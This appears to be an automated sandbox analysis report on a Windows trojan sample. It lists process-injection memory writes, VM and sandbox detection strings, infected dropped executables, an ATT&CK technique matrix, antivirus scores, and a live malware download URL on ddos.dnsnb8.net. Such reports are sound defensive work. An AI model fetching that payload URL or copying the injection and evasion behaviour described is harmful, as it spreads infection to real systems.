Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Memory written: PID: 2196 base: 75950230 value: E9 DA FD 1C 8D	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Memory written: PID: 2196 base: 2B40005 value: E9 5B 2E 84 74	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Memory written: PID: 2196 base: 77382E60 value: E9 AA D1 7B 8B	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Memory written: PID: 2196 base: 2B50005 value: E9 DB 2F 83 74	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Memory written: PID: 2196 base: 77382FE0 value: E9 2A D0 7C 8B	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Memory written: PID: 2196 base: 2B60005 value: E9 BB 2D 82 74	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Memory written: PID: 2196 base: 77382DC0 value: E9 4A D2 7D 8B	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Memory written: PID: 2196 base: 2B70005 value: E9 CB 2A 81 74	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Memory written: PID: 2196 base: 77382AD0 value: E9 3A D5 7E 8B	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Memory written: PID: 2196 base: 2B80005 value: E9 7B 2B 80 74	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Memory written: PID: 2196 base: 77382B80 value: E9 8A D4 7F 8B	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Memory written: PID: 2196 base: 2B90005 value: E9 1B 2F 7F 74	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Memory written: PID: 2196 base: 77382F20 value: E9 EA D0 80 8B	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Memory written: PID: 2196 base: 2BB0005 value: E9 FB 2C 7D 74	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Memory written: PID: 2196 base: 77382D00 value: E9 0A D3 82 8B	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Memory written: PID: 2196 base: 2BC0005 value: E9 2B 2F 7C 74	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Memory written: PID: 2196 base: 77382F30 value: E9 DA D0 83 8B	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Memory written: PID: 2196 base: 2BD0005 value: E9 9B 2F 7B 74	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Memory written: PID: 2196 base: 77382FA0 value: E9 6A D0 84 8B	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Memory written: PID: 2196 base: 2BE0005 value: E9 0B 2D 7A 74	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Memory written: PID: 2196 base: 77382D10 value: E9 FA D2 85 8B	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Memory written: PID: 2196 base: 2BF0005 value: E9 2B 2D 79 74	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Memory written: PID: 2196 base: 77382D30 value: E9 DA D2 86 8B	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Memory written: PID: 2196 base: 2C00005 value: E9 BB 2C 78 74	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Memory written: PID: 2196 base: 77382CC0 value: E9 4A D3 87 8B	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Memory written: PID: 2196 base: 2C10005 value: E9 8B 2F 77 74	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Memory written: PID: 2196 base: 77382F90 value: E9 7A D0 88 8B	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Memory written: PID: 2196 base: 2C20005 value: E9 5B 2B 76 74	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Memory written: PID: 2196 base: 77382B60 value: E9 AA D4 89 8B	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Memory written: PID: 2196 base: 2C30005 value: E9 6B 2B 75 74	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Memory written: PID: 2196 base: 77382B70 value: E9 9A D4 8A 8B	Jump to behavior

Uses known network protocols on non-standard ports

Source: unknown

Network traffic detected: HTTP traffic on port 49710 -> 799

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe, 00000000.00000002.2178560126.0000000000783000.00000020.00000001.01000000.00000003.sdmp

Binary or memory string: Y9/CSBIEDLL.DLL

Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_2-1068

Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe

Code function: 2_2_00641718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00641754h

2_2_00641718

Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe

Code function: 2_2_006429E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,

2_2_006429E2

Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe

Code function: 2_2_00642B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

2_2_00642B8C

Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Source: Amcache.hve.2.dr	Binary or memory string: VMware
Source: Amcache.hve.2.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.2.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.2.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.2.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.2.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.2.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.2.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.2.dr	Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: mXfByV.exe, 00000002.00000002.2214008040.000000000133E000.00000004.00000020.00020000.00000000.sdmp, mXfByV.exe, 00000002.00000003.2152475783.0000000001357000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.2.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: mXfByV.exe, 00000002.00000002.2214008040.000000000133E000.00000004.00000020.00020000.00000000.sdmp, mXfByV.exe, 00000002.00000003.2152475783.0000000001357000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWfQ
Source: Amcache.hve.2.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.2.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.2.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.2.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.2.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.2.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.2.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.2.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.2.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.2.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.2.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.2.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.2.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.2.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.2.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.2.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.2.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.2.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.2.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe

API call chain: ExitProcess graph end node

graph_2-1042

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe

Process information queried: ProcessInformation

Jump to behavior

Source: SciTE.exe.2.dr

Binary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX

Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe

Code function: 2_2_00641718 GetSystemTimeAsFileTime,SHSetValueA,SHGetValueA,__aulldiv,__aulldiv,

2_2_00641718

Source: C:\Users\user\AppData\Local\Temp\mXfByV.exe

Code function: 2_2_0064139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,

2_2_0064139F

Source: Amcache.hve.2.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Bdaejec

Source: Yara match

File source: Process Memory Space: mXfByV.exe PID: 5008, type: MEMORYSTR

Remote Access Functionality

Yara detected Bdaejec

Source: Yara match

File source: Process Memory Space: mXfByV.exe PID: 5008, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	1 Credential API Hooking	11 System Time Discovery	1 Taint Shared Content	1 Credential API Hooking	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	2 Process Injection	1 Access Token Manipulation	11 Input Capture	211 Security Software Discovery	Remote Desktop Protocol	11 Input Capture	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	2 Process Injection	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	1 Archive Collected Data	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	3 File and Directory Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	3 System Information Discovery	SSH	Keylogging	12 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	55%	ReversingLabs	Win32.Trojan.Strictor
SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	50%	Virustotal		Browse
SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	100%	Avira	TR/Black.Gen2
SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Program Files\7-Zip\Uninstall.exe	100%	Avira	W32/Jadtre.B
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	100%	Avira	W32/Jadtre.B
C:\Users\user\AppData\Local\Temp\mXfByV.exe	100%	Avira	TR/Dldr.Small.Z.haljq
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Avira	W32/Jadtre.B
C:\Program Files\7-Zip\Uninstall.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\mXfByV.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\mXfByV.exe	100%	ReversingLabs	Win32.Trojan.Skeeyah
C:\Users\user\AppData\Local\Temp\mXfByV.exe	96%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
ddos.dnsnb8.net	11%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.scintilla.org/scite.rng	0%	URL Reputation	safe
http://www.rftp.comJosiah	0%	URL Reputation	safe
http://www.activestate.com	0%	URL Reputation	safe
http://www.activestate.comHolger	0%	URL Reputation	safe
http://upx.sf.net	0%	URL Reputation	safe
http://www.rftp.com	0%	URL Reputation	safe
http://www.rftp.com	0%	URL Reputation	safe
http://www.baanboard.comBrendon	0%	URL Reputation	safe
https://www.smartsharesystems.com/	0%	URL Reputation	safe
http://www.scintilla.org	0%	URL Reputation	safe
http://www.scintilla.org	0%	URL Reputation	safe
http://www.spaceblue.comMathias	0%	URL Reputation	safe
http://www.spaceblue.comMathias	0%	URL Reputation	safe
https://www.smartsharesystems.com/Morten	0%	URL Reputation	safe
http://www.develop.com	0%	URL Reputation	safe
http://www.lua.org	0%	URL Reputation	safe
http://ddos.dnsnb8.net/	100%	URL Reputation	malware
http://ddos.dnsnb8.net:799/cj//k1.rar	100%	URL Reputation	malware
http://www.spaceblue.com	0%	URL Reputation	safe
http://www.baanboard.com	0%	URL Reputation	safe
http://www.develop.comDeepak	0%	URL Reputation	safe
http://pki-crl.symauth.com/ca_219679623e6b4fa507d638cbeba72ecb/LatestCRL.crl07	0%	Avira URL Cloud	safe
http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsusersIncIEEERootCA.cr	0%	Avira URL Cloud	safe
http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k1.rarn2	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k1.rarD	100%	Avira URL Cloud	malware
http://pki-ocsp.symauth.com0	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k1.rar2p	100%	Avira URL Cloud	malware
http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsusersIncIEEERootCA.cr	0%	Virustotal		Browse
http://ddos.dnsnb8.net:799/cj//k1.rarcC:	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k1.rarD	9%	Virustotal		Browse
http://ddos.dnsnb8.net:799/cj//k1.rar2p	12%	Virustotal		Browse
http://ddos.dnsnb8.net:799/cj//k1.rarcC:	9%	Virustotal		Browse
http://pki-crl.symauth.com/ca_219679623e6b4fa507d638cbeba72ecb/LatestCRL.crl07	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ddos.dnsnb8.net	44.221.84.105	true	true	11%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ddos.dnsnb8.net:799/cj//k1.rar	true	URL Reputation: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.scintilla.org/scite.rng	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
http://www.rftp.comJosiah	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
http://www.activestate.com	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
http://www.activestate.comHolger	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE	mXfByV.exe, 00000002.00000003.2139694761.0000000001250000.00000004.00001000.00020000.00000000.sdmp, mXfByV.exe, 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmp	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.2.dr	false	URL Reputation: safe	unknown
http://www.rftp.com	SciTE.exe.2.dr	false	URL Reputation: safe URL Reputation: safe	unknown
http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsusersIncIEEERootCA.cr	SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://pki-crl.symauth.com/ca_219679623e6b4fa507d638cbeba72ecb/LatestCRL.crl07	SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.baanboard.comBrendon	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
https://www.smartsharesystems.com/	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rarD	mXfByV.exe, 00000002.00000003.2152475783.00000000013B5000.00000004.00000020.00020000.00000000.sdmp	true	9%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.scintilla.org	SciTE.exe.2.dr	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.spaceblue.comMathias	SciTE.exe.2.dr	false	URL Reputation: safe URL Reputation: safe	unknown
https://www.smartsharesystems.com/Morten	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rarn2	mXfByV.exe, 00000002.00000002.2214008040.000000000133E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://www.develop.com	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
http://pki-ocsp.symauth.com0	SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	false	Avira URL Cloud: safe	unknown
http://www.lua.org	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net/	mXfByV.exe, 00000002.00000003.2152475783.0000000001357000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://ddos.dnsnb8.net:799/cj//k1.rar2p	mXfByV.exe, 00000002.00000002.2214279858.0000000002DEA000.00000004.00000010.00020000.00000000.sdmp	true	12%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.spaceblue.com	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
http://www.baanboard.com	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
http://www.develop.comDeepak	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
